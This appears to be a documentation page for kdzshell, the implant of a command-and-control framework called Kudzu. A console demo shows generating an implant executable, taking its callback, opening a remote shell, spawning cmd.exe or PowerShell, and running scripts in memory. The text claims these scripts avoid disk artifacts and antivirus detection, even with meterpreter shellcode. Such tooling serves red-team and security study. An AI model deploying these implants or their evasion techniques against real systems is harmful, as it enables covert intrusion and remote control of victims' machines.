kdzshell

kdzshell is Kudzu's "advanced" implant.

Demo

<kudzu> nodes
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
a7ba067be9 127.0.0.1:7896
<kudzu nodes> implants
<kudzu implants> setop implanttype kdzshell
<kudzu implants> setop listener a7ba067be9
<kudzu implants> showops
Filename 
ImplantType: kdzshell
Listener ID: {a7ba067be9 0xc000208980}
<kudzu implants> setop filename kdzshell.exe
<kudzu implants> run
{kdzshell kdzshell.exe {a7ba067be9 0xc000208980}}
proceed? Y/N > y
generated implant! check ../tmp/kdzshell.exe
<kudzu implants> Got Connection ID: e87b05bdff 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact e87b05bdff
interacting...
e87b05bdff
found node for interaction
<kudzu shell> help
sysinfo: print system info to console
kdz_bg: background current session, return to kdz console
kdz_exit: exit current session, return to kdz console
runscript: run provided kzs in memory. usage: runscript win_calc.kzs
<kudzu shell> cmdshell: spawn cmd.exe shell
pwshell: spawn powershell.exe shell

<kudzu shell> runscript win_calc.kzs
<kudzu shell>

This demonstrates the kdzshell script execution capabilities. As far as my (limited) knowledge goes, there are not artifacts of the script written to the disc, and some of the more advanced scripts I've played with have not triggered AV products, even while deploying unmodified meterpreter shellcode generated via msfvenom. This scripting capability is the entire reason this project was conceived, it brings the extensibility of a scripting language based framework like metasploit over to a compiled language like go.

PreviousKudzu NextScripts

Last updated 4 years ago

hashtagDemo

Demo